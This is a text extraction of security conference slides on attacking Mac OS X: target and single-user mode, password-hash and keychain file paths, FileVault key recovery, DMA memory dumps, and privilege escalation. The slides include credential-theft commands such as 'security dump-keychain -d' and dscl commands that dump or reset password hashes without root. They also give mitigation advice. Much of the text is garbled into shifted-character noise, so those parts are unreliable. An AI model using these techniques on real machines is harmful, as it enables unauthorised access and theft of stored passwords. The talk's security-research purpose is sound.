Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science

H ck Mac OS X

advertisement 
Hck Mac OS X
Tips and tricks for Mac OS X hack
Summary
Introduction
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Introduction
Introduction
Market Share
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Mac vs Windows
Introduction
Market Share
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
by continent
Introduction
Mac OS X history
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
1996 : Purchase of NeXT and NeXTSTEP OS by Apple
1996 : Come back of Steve Jobs within Apple (left in
1985)
1999 : First version of Mac OS X server (1.0)
2001 : First version of Mac OS X Workstation (10.0
Cheetah)
2006 : First Mac(Book) without PowerPC processor
and with Intel processor
Introduction
Mac OS X architecture
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
UNIX system
Based on Darwin OS (hybrid kernel XNU)
Kernel XNU is based on micro-kernel of NeXTSTEP
(Mach) and kernel of BSD (FreeBSD)
But Darwin doesn’t contain graphical motor “Quartz”
Introduction
Exploitation of target mode
Mac OS X architecture
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Mach
Applications services
Mac interfaces
IO Toolkit
Login Windows
EFI
BSD
Quartz/Aqua
Platform Expert
Launchd
Finder/Dock
Core services
Applications
Darwin (Mach)
OS X
Hardware
Kernel space
User space
Exploitation of target mode
Introduction
About target mode
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
During the starting > press “T”
Access not protected by default
I@@5779GGHCH<9R@9GGMGH9A8=G?H<FCI;<R@9GA5B5;9F
Introduction
Alternatives
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Single mode (press “Apple + S”)
From live OS in USB/CD device > Press “Alt”
From Mac OS X installation DVD > Press “C” and select
Reset Password from installer
Introduction
Identify system users
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
User UID in /private/var/db/dslocal/indices/Default/index
User privileges in /var/db/dslocal/nodes/Default/groupe/admin.plist
Introduction
Identify system passwords
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Hashes passwords in /var/db/shadow/hash
Find clear password with brute force attack (JTR)
Introduction
6CIH$9M7<5=BR@9
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
$9M7<5=BR@9GHCF9GG97F9HG85H5@=?9Safari passwords, WIFI
keys, Skype username/password, Google username/password (contact, Picasa),
Exchange username/password, ...
Introduction
(D9B$9M7<5=BR@9G
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
For each user, Keychain is stored in /Users/<USER>/Library/
Keychains/login.keychain
$9M7<5=BR@9G5F9DFCH97H986M?9M7<5=BD5GGKCF8
"HQGDCGG=6@9HC=ADCFH5BM$9M7<5=BR@9GK=H<CIH?BCK
the Keychain password
Introduction
(D9B$9M7<5=BR@9G
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
But, you have to know “keychain” password to exploit it :(
By default, “keychain” password is equal to user system
password :-)
Introduction
(D9B$9M7<5=BR@9G
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
You can identity password in volatility data
You can attempt identify password by brute force attack
Introduction
About Filevault encryption
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
B7FMDH=CBC:R@9GMGH9A,
DM-Crypt
@=?9=H%C7?9FCF
I@@9B7FMDH=CB:FCA%=CBJ9FG=CB
Only Home directory encryption for previous versions
Native function from Mac OS X 10.3
“.dmg” images can use Filevault encryption
Introduction
About Filevault encryption
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Home directory without encryption
Home directory with Filevault encryption
Introduction
(D9B=@9J5I@HR@9
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
=@9J5I@HR@9=GGHCF98=B/Users/<USER>/test.sparsebundle
=@9J5I@HR@9G5F9DFCH97H986MD5GGKCF8
... and it’s the same as <user> system password :-)
,C:FCAH5F;9HAC89=HQG95GMHC897FMDHH<=GR@9
Introduction
(D9B=@9J5I@HR@9
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
You can identity AES key in volatility data ...
Else, without access to hashes password, it is possible to
5HH9ADHHCRB8D5GGKCF86M6FIH9:CF795HH57?
Exploitation of physical memory
Introduction
Physical memory dump
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
From root access, MacMemoryReader can dump RAM
MMR create temporary kernel extension to read /dev/
mem devices
Introduction
Physical memory dump
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
4'!!+%(#!56'! contained physical memory dump for
safe mode (hibernation mode)
FCA:I@@5779GG8=G?O,@99D=A5;9PR@975B69J=9K98
FCAF979BHJ9FG=CBGR@9=G9B7FMDH98
Configuration of encryption of “sleepimpage”
(root privileges to modification)
Introduction
Physical memory dump
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Physical extraction ...
+
Tools to extract RAM > http://www.mcgrewsecurity.com
Introduction
Physical memory dump
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
From DMA access, RAM dump is possible and EASY
“pythonraw1394” libraries allow to dump RAM of
0=B8CKGGMGH9A:FCA%=BIL(2006 - Adam Boileau - Winlockpwn)
“libforensic1394” (Freddie Witherden) libraries allow to dump
+&C:&(,1:FCA(,1CF%=BIL
Introduction
DMA access - PoC
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Using of “libforensic1394” libraries is very easy :-) and
allow to write code to dump RAM ...
Introduction
Exploit DMA access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
DEMO
$..+ -/
()'*#-+*.",
0% !*!2+'*%.6,!1%,!!--#%)-.$.('
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Identify current username for a locked session (open without auto
logon)
Identify password for a locked session (open without auto logon)
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Identify current username for a locked session (open with auto
logon)
Identify current password for a locked session (open with auto
logon)
Identify just username for a locked session after startup
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
A lot of others data secret are into physical memory like :
Email / Calendar data
(:R798C7IA9BHG85H5
Web passwords
Software passwords
Keychain password
...
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
AES 128 key used for Filevault encryption can be found
into physical memory and allows to :
97FMDH9B7FMDH98<CA98=F97HCF=9G5B8:I@@9B7FMDH988=G?G%=CBJ9FG=CB
Identify secret data in hard disk (like system passwords)
Unlock system
,$9MRB8HCC@75B9LHF57H,?9MG
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Passware Kit 11.3 can extract and exploit the found keys
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
P0C to identify Web and software passwords
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
P0C to identify Web and software passwords
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
P0C to identify Mac OSX passwords
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
P0C to identify Mac OSX passwords
Introduction
Identify secret data
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Is it possible to extract secret data when full encryption is
57H=J5H98%=CBJ9FG=CB6M&5779GG
YES !
but NO if :
System is not started (pre-boot authentication screen)
System is hibernated in forcing to remove power from RAM (hibernatemode=25)
'H<9D5F5A9H9FHCF9ACJ9R@9J5I@H?9MG=B+&=G57H=J5H98
(destroyfvkeyonstandby=1)
Introduction
Writing physical memory
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
... to bypass session password with “libforensic1394”
libraries !
but ... it doesn’t work :-(
Introduction
Writing physical memory
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Inception tool (breaknenter.org) will include options to bypass
password screen but are not still implemented
Actually, I search the good signature for 10.6 and 10.7
Introduction
B8-<IB89F6C@HDCFH Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
@=?9RF9K=F9DCFHK=H<585DH9F
and so can be exploited :-)
Exploitation of user privileges
Introduction
Obtain system user access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
From physical access
Identify trivial password
Exploit DMA access, single mode, ...
LD@C=H5IHC@C;CBG9GG=CB:CFH<9RFGH7CBR;IF98IG9FFCCHDF=J=@9;9G6M89:5I@H
From remote access
Identify services and usernames from mDNS service (UDP/5353) of Bonjour (or
“Zeroconf”) service
Introduction
Obtain system user access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
From remote access
By common “server side” vulnerabilities like SMB, SSH, WEB, ...
By “client side” vulnerabilities of Safari, iTunes, iChat, Quicktime, Skype, ...
*+,-%.&'/' >$:1(&M$:N%)+&R& 01%234%5+&'(' 3H%):+&-&
9%:$M$:N%)+&A<&
OD;%)D%;&P@H$")%)+&JQ&
!""#$%&'()"*%+&,-&
B("0KL:F%&
M$:N%)+&J5&
!"#"$%&'()'
BCD&E:F:&
G%F%$"H*%D;&I/;+&J-&
./0)"1"2&340%+&5,&
."=/$$:&>/)%?"@+&5A&
67"8%&9%:7%)&%;&
60)"8:;+&5<&
Top 13 vulnerabilities in 2010
Introduction
Obtain system user access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
From remote access
By common “server side” vulnerabilities like SMB, SSH, WEB, ...
By “client side” vulnerabilities of Safari, iTunes, iChat, Quicktime, Skype, ...
MS and Apple are affected
Just Apple is affected
Apple is not affected
Security updates for Apple products
Introduction
Obtain system user access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
“exploit-db.com” stores a lot of remote exploits
Sample of remote exploits for Mac OS X
“exploit-db.com” stores 15 remote exploits for Mac OS
X platform from 2010 and 145 remote exploits for
Windows platform from 2011
Most of vulnerabilities are due to a third party soft
Introduction
Obtain system user access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
%=?9CH<9FG(,O&9H5GD@C=HP5@@CKGHC95GM9L97IH9
code under the context of the user
Safari exploit > cve-2011-3230
Introduction
User privileges escalation
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Previously, if you obtain root privileges
You can execute a lot of operation (Cf. Exploitation of target mode)
but password can be useful ...
Previously, if you obtain user privileges
2CI75B5HH9ADHHC9LHF57HG97F9H85H5=BHC85H5CFGMGH9AR@9D9FGCB5@85H5
GHCF98D5GGKCF8=BHCHLHR@99A5=@G You can attempt to% !).%"30/')!,%'%.%!-*"*)6#/,.%*)*,-*".1,!
You can attempt to exploit native Mac OS X functions
...
Introduction
Exploit Mac OS X vulnerabilities
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
/I@B9F56=@=H=9G9LD@C=H5H=CB=GACF98=:R7I@HK=H<,%+
:FCA%9CD5F8 J9FG=CB:I@@,%+:FCA%=CB “exploit-db.com” stores a lot of local root exploits
Sample of local root exploit updates for Max OS X
44 local exploits for Mac OS X from 2003 and 220 for
Windows from 2011
Most of vulnerabilities are due to a third party soft
Introduction
Exploit native functions
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Using and copy stored passwords into Keychain requires
user password
Introduction
Exploit Keychain access
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
But with “security” command, allows to bypass
password prompt ... :-)
It’s my
Evernote
password
Sample of “security dump-keychain -d” command
Others extracted passwords : Safari passwords, WIFI keys, Skype
username/password, Google username/password (contact, Picasa), Exchange
username/password, ...
One of these passwords is maybe root password ...
Introduction
Exploit Keychain
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Exploitation is possible just with “login.keychain”
Exploitation is possible because “login.keychain” is
automatically open during the session ... if only keychain
password is identical to user system password
Opening of “system.keychain” requires login and
password
Introduction
Recents tips to escalate priv.
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
CVE-2011-3435/36 : Exploit of dscl command to dump
hashes password or to reset password without be root :
$dscl localhost -read /Search/Users/<User>
$dscl localhost -passwd /Search/Users/<User>
LD@C=HOA57DCFHP7CBR;IF5H=CBHC<5J95F9ACH9FCCH
http://blog.infobytesec.com/2011/07/pwning-mac-os-x-withevilgrade-macports.html?m=1
Exploit application outside of sandbox to by pass
restriction on application within sandbox
http://www.generation-nt.com/mac-lion-faille-sandbox-corelabsactualite-1501811.html
Conlusion
Introduction
&57(,1G97IF98CFBCH
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Secured Mac OS X is as secured as Windows
http://www.securityvibes.fr/produits-technologies/osx-lion-securite/
More exploits for Windows than Mac OS X because of
market share (more users so more researches ...)
Conclusion
Introduction
Physical access is not secured
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
By default, my son could own my Mac Book
by Single mode, by Target mode, by access DMA, ...
as opposed to Windows PC (using DMA)
-C@=A=HH<5H=H=GB979GG5FMHC=BGH5@@GC:HK5F9HC7CBR;IF9
EFI password and it not easy like under BIOS !
Password Prompt during startup
6IHAC8=R75H=CBC:A5H9F=5@7CBR;IF5H=CB5@@CKGHCF9G9H
password ...
Introduction
Optimum protection
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Use full disk encryption (Filevault, Truecrypt, ...)
B7FMDHOG@99D=A5;9PR@9:CF79HCF9ACJ9DCK9F:FCA+&
Use a different password for system access and Keychain or use
5IH<9BH=75H=CB6M79FH=R75H9http://www.opensc-project.org/sca/wiki/LogonAuthenticate)
Use strong passwords and change regularly yours passwords
CBR;IF9GMGH9AHC=BGH5@@5IHCA5H=75@@MG97IF=HMD5H7<G
CBR;IF9@C75@RF9K5@@HC6@C7?=BDIH7CBB97H=CBG
Install antivirus system (ClamXav, Avast, Intego, BitDefender, FSecure, Panda Antivirus,...)
Disable remote services (mDNS, SMB, Web, HTTP, ...)
Introduction
Optimum protection
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Disable remote services (mDNS, SMB, Web, HTTP, ...)
) 0*% .*+/'%-$3*/,-3-.!(&/+*,&!3$%)6'!-*)
Internet
no .... ???? Yes !!!
Google is your friend or not (for the victims)
Introduction
$9M7<5=BR@9G5B8 !
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
!Google Hacking DataBase
=BIF@=BH=H@9R@9HMD9
Very easy to :
=89BH=:M?9M7<5=BR@9G@=?9 ?9M7<5=B
Conclusion
Introduction
5B8)-
iSEC Partners : http://www.isecpartners.com/storage/docs/
presentations/iSEC_BH2011_Mac_APT.pdf
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Introduction
Exploitation of target mode
Exploitation of physical memory
Exploitation of user privileges
Conclusion
Questions ?
Slides, paper and tools on :
http://sud0man.blogspot.com
sganama[at]gmail.com / @sud0man
Related documents
Workshop on International Law, Natural Resources and Sustainable Development
Workshop on International Law, Natural Resources and Sustainable Development
Workshop on International Law, Natural Resources and Sustainable Development
Workshop on International Law, Natural Resources and Sustainable Development
Unit 2: Rhetoric of the Op-Ed Writing Prompt An organization called
Unit 2: Rhetoric of the Op-Ed Writing Prompt An organization called
Wzór wniosku grantowego do Horyzontu 2020
Wzór wniosku grantowego do Horyzontu 2020
Organizations of Domination
Organizations of Domination
Download
advertisement